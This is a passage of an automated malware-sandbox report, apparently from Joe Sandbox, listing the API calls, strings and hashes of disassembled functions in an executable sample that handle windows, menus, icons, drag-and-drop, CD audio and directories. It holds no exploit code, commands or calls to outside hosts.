                                                      • GetParent.USER32(?), ref: 00ABACC7
                                                      • ScreenToClient.USER32(00000000), ref: 00ABACCE
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ABAD48
                                                      • _wcscmp.LIBCMT ref: 00ABAD5C
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00ABAD82
                                                      • _wcscmp.LIBCMT ref: 00ABAD96
                                                        • Part of subcall function 00A8386C: _iswctype.LIBCMT ref: 00A83874
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: e883cd043447b23f2d0d63d373127f8c277c840f39643bcf2b1fe5498bbdd218
                                                      • Instruction ID: 9b62cee6d4491c299a57ee68cd6890d4ef2eebfd5eba210b50c4aeace451d993
                                                      • Opcode Fuzzy Hash: e883cd043447b23f2d0d63d373127f8c277c840f39643bcf2b1fe5498bbdd218
                                                      • Instruction Fuzzy Hash: A1A1CF71204246AFDB14DF64C884BEABBECFF14355F108629F9A9C2192D730E955CB92
                                                      Function 00ABB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00ABB3DB
                                                      • _wcscmp.LIBCMT ref: 00ABB3EC
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ABB414
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00ABB431
                                                      • _wcscmp.LIBCMT ref: 00ABB44F
                                                      • _wcsstr.LIBCMT ref: 00ABB460
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ABB498
                                                      • _wcscmp.LIBCMT ref: 00ABB4A8
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ABB4CF
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ABB518
                                                      • _wcscmp.LIBCMT ref: 00ABB528
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00ABB550
                                                      • GetWindowRect.USER32(00000004,?), ref: 00ABB5B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: 70f711e8545365fe95bb876a2bd77d89a40c94943be656321bc713fc8f8cd5ad
                                                      • Instruction ID: cce44db0c64cd6ed5bf95702ed00a581090348c65b30b3b2486f8a57e5cef3e4
                                                      • Opcode Fuzzy Hash: 70f711e8545365fe95bb876a2bd77d89a40c94943be656321bc713fc8f8cd5ad
                                                      • Instruction Fuzzy Hash: E8818A720182459FDB14DF14C985FAA7BECFF44714F088569ED8A8A0A3DBB0DE46CB61
                                                      Function 00ABB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: a8b9cd22476fe83b954d910392183f31e6e2632fe1f0e94ede70bf2bbfd80c27
                                                      • Instruction ID: ed69ad0f28bcaab945140df51139ae38afdbdc104c323eafd9a75db2fdef9570
                                                      • Opcode Fuzzy Hash: a8b9cd22476fe83b954d910392183f31e6e2632fe1f0e94ede70bf2bbfd80c27
                                                      • Instruction Fuzzy Hash: D7319231A54245AADF14FB60CE63EEE77F89F20B50FA00565F451720E2EFA1AF44CA61
                                                      Function 00ABC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00ABC4D4
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ABC4E6
                                                      • SetWindowTextW.USER32(?,?), ref: 00ABC4FD
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ABC512
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ABC518
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ABC528
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ABC52E
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ABC54F
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ABC569
                                                      • GetWindowRect.USER32(?,?), ref: 00ABC572
                                                      • SetWindowTextW.USER32(?,?), ref: 00ABC5DD
                                                      • GetDesktopWindow.USER32 ref: 00ABC5E3
                                                      • GetWindowRect.USER32(00000000), ref: 00ABC5EA
                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ABC636
                                                      • GetClientRect.USER32(?,?), ref: 00ABC643
                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ABC668
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ABC693
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: 2a28b2e8d00c458a2ea465a0ed9fa4078ed14001cb8b3b1928d14c690bc0a4f0
                                                      • Instruction ID: eb0c11897e9862893cb3adb9bfe2200cadfbe3c5fa7ab40ebacf5f0df001b649
                                                      • Opcode Fuzzy Hash: 2a28b2e8d00c458a2ea465a0ed9fa4078ed14001cb8b3b1928d14c690bc0a4f0
                                                      • Instruction Fuzzy Hash: 99518170900749AFDB20DFA8DE89FAEBBF9FF04714F004528E686A65A1D774B905CB50
                                                      Function 00AEA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AEA4C8
                                                      • DestroyWindow.USER32(?,?), ref: 00AEA542
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AEA5BC
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AEA5DE
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AEA5F1
                                                      • DestroyWindow.USER32(00000000), ref: 00AEA613
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A60000,00000000), ref: 00AEA64A
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AEA663
                                                      • GetDesktopWindow.USER32 ref: 00AEA67C
                                                      • GetWindowRect.USER32(00000000), ref: 00AEA683
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AEA69B
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AEA6B3
                                                        • Part of subcall function 00A625DB: GetWindowLongW.USER32(?,000000EB), ref: 00A625EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: d3d1dc5ff43ea47741a6f4ab670c15eb5cbfddcd64f3c881742487d7a4d5c2a0
                                                      • Instruction ID: 754fa07c9f77cd6352b9550714a3f32d034582a220e6b23b90c49399fd31f68b
                                                      • Opcode Fuzzy Hash: d3d1dc5ff43ea47741a6f4ab670c15eb5cbfddcd64f3c881742487d7a4d5c2a0
                                                      • Instruction Fuzzy Hash: 6E71AB71140285AFD720CF28CC49F6A7BF6FB99304F08492DF9958B2A0DB70E942CB12
                                                      Function 00AEC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00AEC917
                                                        • Part of subcall function 00AEADF1: ClientToScreen.USER32(?,?), ref: 00AEAE1A
                                                        • Part of subcall function 00AEADF1: GetWindowRect.USER32(?,?), ref: 00AEAE90
                                                        • Part of subcall function 00AEADF1: PtInRect.USER32(?,?,00AEC304), ref: 00AEAEA0
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AEC980
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AEC98B
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AEC9AE
                                                      • _wcscat.LIBCMT ref: 00AEC9DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AEC9F5
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AECA0E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AECA25
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AECA47
                                                      • DragFinish.SHELL32(?), ref: 00AECA4E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AECB41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: 2ff331ecb6f9f3eb51e593380f3e937cde515b20bc8bd260455c980172745028
                                                      • Instruction ID: a1d8e00eec21d1cd516bde0281de93c13740ce9df20834bd7c3f950a0623927f
                                                      • Opcode Fuzzy Hash: 2ff331ecb6f9f3eb51e593380f3e937cde515b20bc8bd260455c980172745028
                                                      • Instruction Fuzzy Hash: E1615771108380AFC711EFA4D985D9FBBF8EF98750F000A2EF591961A1DB709A4ACB52
                                                      Function 00AE4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AE46AB
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AE46F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: e02747317a91bb1ea04bbe27bdb8e62e437699b36b50206e263b0d5c1ffcadca
                                                      • Instruction ID: 1728a4a318883863e26d5b21880c3946e4aa759fa06e88a52c4d89522878ec2e
                                                      • Opcode Fuzzy Hash: e02747317a91bb1ea04bbe27bdb8e62e437699b36b50206e263b0d5c1ffcadca
                                                      • Instruction Fuzzy Hash: 1E916F352043419FCB14EF21C551AAAB7FAAF99354F04885CF8965B3A3CB30ED4ACB81
                                                      Function 00AEBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AEBB6E
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AE9431), ref: 00AEBBCA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AEBC03
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AEBC46
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AEBC7D
                                                      • FreeLibrary.KERNEL32(?), ref: 00AEBC89
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AEBC99
                                                      • DestroyIcon.USER32(?,?,?,?,?,00AE9431), ref: 00AEBCA8
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AEBCC5
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AEBCD1
                                                        • Part of subcall function 00A8313D: __wcsicmp_l.LIBCMT ref: 00A831C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 1212759294-1154884017
                                                      • Opcode ID: 23f476ef069238179a92267ebe06504aa7a88995f88a0938f87c9639d883747f
                                                      • Instruction ID: beb61c4deae3f8fc5adbf45de4866d2ca96140dde7641179758b4ce5a56aa33c
                                                      • Opcode Fuzzy Hash: 23f476ef069238179a92267ebe06504aa7a88995f88a0938f87c9639d883747f
                                                      • Instruction Fuzzy Hash: 3861DF71510299BEEB14DF65CD89FBF7BB8EB08710F204219F915DA1D0DB74AA90CBA0
                                                      Function 00ACA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • CharLowerBuffW.USER32(?,?), ref: 00ACA636
                                                      • GetDriveTypeW.KERNEL32 ref: 00ACA683
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACA6CB
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACA702
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACA730
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: 35fe90830ede5f9771e15d0023445d06b8e3e35d7790d5cd739eca0d0d346731
                                                      • Instruction ID: 8560d57fbce1eb2c23f5d32fb7b7125b190a7ed33f90705cf4e385f49c19380a
                                                      • Opcode Fuzzy Hash: 35fe90830ede5f9771e15d0023445d06b8e3e35d7790d5cd739eca0d0d346731
                                                      • Instruction Fuzzy Hash: CD5137711043049FC700EF20CA91D6AB7F8FF98758F54496DF89A972A1DB31AE0ACB52
                                                      Function 00ACA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00ACA47A
                                                      • __swprintf.LIBCMT ref: 00ACA49C
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ACA4D9
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ACA4FE
                                                      • _memset.LIBCMT ref: 00ACA51D
                                                      • _wcsncpy.LIBCMT ref: 00ACA559
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00ACA58E
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ACA599
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00ACA5A2
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ACA5AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: a49e8f9b68ac4b9029ed8d15ecd26e8b68c57508b88fad747d6a063d933421f1
                                                      • Instruction ID: b1aabd856d8835c5217a8506869dd2e67b37f4aa63afb90c1ed09da183acc2ad
                                                      • Opcode Fuzzy Hash: a49e8f9b68ac4b9029ed8d15ecd26e8b68c57508b88fad747d6a063d933421f1
                                                      • Instruction Fuzzy Hash: 51316F7690015EAADB21DBA0DC89FFB77BCEF88705F1041BAFA08D6160E77096458B25
                                                      Function 00ACDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 00ACDC7B
                                                      • _wcscat.LIBCMT ref: 00ACDC93
                                                      • _wcscat.LIBCMT ref: 00ACDCA5
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ACDCBA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACDCCE
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ACDCE6
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00ACDD00
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ACDD12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      • Opcode ID: 932b5443448191aeaf64af748ccff5427e2e47c68981897925dc1562ff3641ab
                                                      • Instruction ID: 9841738d5bc5430d7e574d4df5d1a448307a44c86802ff8d12e091eef0958f81
                                                      • Opcode Fuzzy Hash: 932b5443448191aeaf64af748ccff5427e2e47c68981897925dc1562ff3641ab
                                                      • Instruction Fuzzy Hash: 958164755082419FCB24EF64C945EAAB7E8BF88350F1A883EF889CB251E730ED45CB51
                                                      Function 00AEC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AEC4EC
                                                      • GetFocus.USER32 ref: 00AEC4FC
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00AEC507
                                                      • _memset.LIBCMT ref: 00AEC632
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AEC65D
                                                      • GetMenuItemCount.USER32(?), ref: 00AEC67D
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00AEC690
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AEC6C4
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AEC70C
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AEC744
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00AEC779
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: 53fc0c3c71b970d2aac29d4d6856f2282918c619f67afe3cd5d305d44eb9be60
                                                      • Instruction ID: 4a860f84bc01d12293e2a91012216eea8f358124d314195fa191a307de3f764a
                                                      • Opcode Fuzzy Hash: 53fc0c3c71b970d2aac29d4d6856f2282918c619f67afe3cd5d305d44eb9be60
                                                      • Instruction Fuzzy Hash: F4819171208391AFD720DF25D984A6BBBE8FF88724F00492DF99597291D770D906CFA2
                                                      Function 00AB83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AB8766
                                                        • Part of subcall function 00AB874A: GetLastError.KERNEL32(?,00AB822A,?,?,?), ref: 00AB8770
                                                        • Part of subcall function 00AB874A: GetProcessHeap.KERNEL32(00000008,?,?,00AB822A,?,?,?), ref: 00AB877F
                                                        • Part of subcall function 00AB874A: HeapAlloc.KERNEL32(00000000,?,00AB822A,?,?,?), ref: 00AB8786
